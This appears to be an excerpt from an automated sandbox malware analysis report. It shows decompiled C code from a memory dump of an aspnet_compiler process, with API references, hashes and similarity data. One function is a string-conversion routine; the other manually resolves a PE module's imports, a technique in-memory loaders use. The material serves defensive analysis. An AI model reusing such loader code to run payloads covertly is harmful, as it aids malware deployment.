                    				_t67 = _a4;
                    				_t68 = 0;
                    				if(_t67 == 0) {
                    					L3:
                    					if(_a8 != _t68) {
                    						E004390B7(_t53,  &_v28, _t64, _a16);
                    						_t34 = _v24;
                    						__eflags = _t67;
                    						if(_t67 == 0) {
                    							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                    							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                    								_t69 = _t68 | 0xffffffff;
                    								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                    								__eflags = _t35;
                    								if(_t35 != 0) {
                    									L29:
                    									_t28 = _t35 - 1; // -1
                    									_t69 = _t28;
                    									L30:
                    									__eflags = _v16;
                    									if(_v16 != 0) {
                    										_t55 = _v28;
                    										_t31 = _t55 + 0x350;
                    										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                    										__eflags =  *_t31;
                    									}
                    									return _t69;
                    								}
                    								 *((intOrPtr*)(E0043EEAD())) = 0x2a;
                    								goto L30;
                    							}
                    							_t70 = _a8;
                    							_t56 = _t70 + 1;
                    							do {
                    								_t38 =  *_t70;
                    								_t70 = _t70 + 1;
                    								__eflags = _t38;
                    							} while (_t38 != 0);
                    							_t69 = _t70 - _t56;
                    							goto L30;
                    						}
                    						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                    						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                    							_t69 = _t68 | 0xffffffff;
                    							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                    							__eflags = _t35;
                    							if(_t35 != 0) {
                    								goto L29;
                    							}
                    							_t39 = GetLastError();
                    							__eflags = _t39 - 0x7a;
                    							if(_t39 != 0x7a) {
                    								L21:
                    								 *((intOrPtr*)(E0043EEAD())) = 0x2a;
                    								 *_t67 = 0;
                    								goto L30;
                    							}
                    							_t42 = _a8;
                    							_t57 = _t42;
                    							_v8 = _t57;
                    							_t65 = _t53;
                    							__eflags = _t53;
                    							if(_t53 == 0) {
                    								L20:
                    								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                    								__eflags = _t44;
                    								if(_t44 != 0) {
                    									_t69 = _t44;
                    									goto L30;
                    								}
                    								goto L21;
                    							} else {
                    								goto L15;
                    							}
                    							while(1) {
                    								L15:
                    								_t45 =  *_t57;
                    								_v12 = _t65 - 1;
                    								__eflags =  *_t57;
                    								if(__eflags == 0) {
                    									break;
                    								}
                    								_t47 = E00449490(__eflags, _t45 & 0x000000ff,  &_v24);
                    								_t62 = _v8;
                    								__eflags = _t47;
                    								if(_t47 == 0) {
                    									L18:
                    									_t65 = _v12;
                    									_t57 = _t62 + 1;
                    									_v8 = _t57;
                    									__eflags = _t65;
                    									if(_t65 != 0) {
                    										continue;
                    									}
                    									break;
                    								}
                    								_t62 = _t62 + 1;
                    								__eflags =  *_t62;
                    								if( *_t62 == 0) {
                    									goto L21;
                    								}
                    								goto L18;
                    							}
                    							_t42 = _a8;
                    							goto L20;
                    						}
                    						__eflags = _t53;
                    						if(_t53 == 0) {
                    							goto L30;
                    						}
                    						_t63 = _a8;
                    						while(1) {
                    							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                    							__eflags =  *(_t68 + _t63);
                    							if( *(_t68 + _t63) == 0) {
                    								goto L30;
                    							}
                    							_t68 =  &(_t68[0]);
                    							_t67 =  &(_t67[1]);
                    							__eflags = _t68 - _t53;
                    							if(_t68 < _t53) {
                    								continue;
                    							}
                    							goto L30;
                    						}
                    						goto L30;
                    					}
                    					 *((intOrPtr*)(E0043EEAD())) = 0x16;
                    					return E0043A5BB() | 0xffffffff;
                    				}
                    				if(_t53 != 0) {
                    					 *_t67 = 0;
                    					goto L3;
                    				}
                    				return 0;
                    			}

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043F5F7
                    • GetLastError.KERNEL32 ref: 0043F605
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043F660
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast
                    • String ID:
                    • API String ID: 1717984340-0
                    • Opcode ID: 4fb4c8b8568d1047ed6eec146a53b7fea1d3df898e1d451945ab7130e1f9dab9
                    • Instruction ID: 66686387026925be6180075210ad86107624aebec9d48f20dae67bb7d6d05db2
                    • Opcode Fuzzy Hash: 4fb4c8b8568d1047ed6eec146a53b7fea1d3df898e1d451945ab7130e1f9dab9
                    • Instruction Fuzzy Hash: 7541F831E04206AFDB218F65C846ABB7BA4DF09320F14517FF895972B1DB388D06CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E004110A2(intOrPtr* __ecx) {
                    				intOrPtr _t38;
                    				intOrPtr _t41;
                    				void _t49;
                    				int _t52;
                    				signed short _t54;
                    				signed int _t55;
                    				intOrPtr _t56;
                    				intOrPtr _t58;
                    				intOrPtr _t59;
                    				signed short* _t60;
                    				intOrPtr _t66;
                    				intOrPtr _t69;
                    				intOrPtr _t73;
                    				void _t74;
                    				void* _t77;
                    				intOrPtr* _t78;
                    				void* _t81;
                    				void* _t83;
                    				void* _t84;
                    
                    				_t78 = __ecx;
                    				_t77 = 1;
                    				_t38 =  *__ecx;
                    				_t58 =  *((intOrPtr*)(__ecx + 4));
                    				 *((intOrPtr*)(_t84 + 0x10)) = _t58;
                    				if( *((intOrPtr*)(_t38 + 0x84)) != 0) {
                    					_t81 =  *((intOrPtr*)(_t38 + 0x80)) + _t58;
                    					if(IsBadReadPtr(_t81, 0x14) == 0) {
                    						_t83 = _t81 + 0x10;
                    						while(1) {
                    							_t41 =  *((intOrPtr*)(_t83 - 4));
                    							if(_t41 == 0) {
                    								goto L24;
                    							}
                    							_t59 =  *((intOrPtr*)(_t78 + 0x24))(_t41 + _t58,  *((intOrPtr*)(_t78 + 0x34)));
                    							 *((intOrPtr*)(_t84 + 0x20)) = _t59;
                    							if(_t59 == 0) {
                    								SetLastError(0x7e);
                    								goto L23;
                    							} else {
                    								_push(4 +  *(_t78 + 0xc) * 4);
                    								_push( *((intOrPtr*)(_t78 + 8)));
                    								_t66 = E0043F7DD();
                    								if(_t66 == 0) {
                    									 *((intOrPtr*)(_t78 + 0x2c))(_t59,  *((intOrPtr*)(_t78 + 0x34)));
                    									SetLastError(0xe);
                    									L23:
                    									_t77 = 0;
                    								} else {
                    									 *((intOrPtr*)(_t78 + 8)) = _t66;
                    									 *((intOrPtr*)(_t66 +  *(_t78 + 0xc) * 4)) = _t59;
                    									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
                    									_t49 =  *(_t83 - 0x10);
                    									if(_t49 == 0) {
                    										_t49 =  *_t83;
                    									}
                    									_t69 =  *((intOrPtr*)(_t84 + 0x14));
                    									_t74 =  *_t83;
                    									_t60 = _t49 + _t69;
                    									if( *_t60 != 0) {
                    										 *((intOrPtr*)(_t84 + 0x10)) = _t74 - _t60 + _t69;
                    										while(1) {
                    											_t54 =  *_t60;
                    											_push( *((intOrPtr*)(_t78 + 0x34)));
                    											if(_t54 >= 0) {
                    												_t55 = _t54 + _t69 + 2;
                    											} else {
                    												_t55 = _t54 & 0x0000ffff;
                    											}
                    											_t56 =  *((intOrPtr*)(_t78 + 0x28))( *((intOrPtr*)(_t84 + 0x20)), _t55);
                    											_t73 =  *((intOrPtr*)(_t84 + 0x1c));
                    											_t84 = _t84 + 0xc;
                    											 *((intOrPtr*)(_t73 + _t60)) = _t56;
                    											if( *((intOrPtr*)(_t73 + _t60)) == 0) {
                    												break;
                    											}
                    											_t69 =  *((intOrPtr*)(_t84 + 0x14));
                    											_t60 =  &(_t60[2]);
                    											if( *_t60 != 0) {
                    												continue;
                    											} else {
                    											}
                    											goto L17;
                    										}
                    										_t77 = 0;
                    									}
                    									L17:
                    									if(_t77 == 0) {
                    										 *((intOrPtr*)(_t78 + 0x2c))( *((intOrPtr*)(_t84 + 0x1c)),  *((intOrPtr*)(_t78 + 0x34)));
                    										SetLastError(0x7f);
                    									} else {
                    										_t83 = _t83 + 0x14;
                    										_t52 = IsBadReadPtr(_t83 - 0x10, 0x14);
                    										_t58 =  *((intOrPtr*)(_t84 + 0x14));
                    										if(_t52 == 0) {
                    											continue;
                    										} else {
                    										}
                    									}
                    								}
                    							}
                    							goto L24;
                    						}
                    					}
                    					L24:
                    				}
                    				return _t77;
                    			}

                    APIs
                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411433), ref: 004110CF
                    • IsBadReadPtr.KERNEL32(?,00000014,00411433), ref: 0041119B
                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004111BD
                    • SetLastError.KERNEL32(0000007E,00411433), ref: 004111D4
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastRead
                    • String ID:
                    • API String ID: 4100373531-0
                    • Opcode ID: 9794c43bf96480927521ed5b23b738f4c51868486ab28171da95fa3270170194
                    • Instruction ID: 8f6c103362ea378475082746bf01fa46c2f289026e2d243d47b01123f6745c32
                    • Opcode Fuzzy Hash: 9794c43bf96480927521ed5b23b738f4c51868486ab28171da95fa3270170194
                    • Instruction Fuzzy Hash: 36418E71604305AFEB248F19DC84BA7B7E5FF48714F00482EEB46876A1EB34E845CB19
                    Uniqueness

                    Uniqueness Score: -1.00%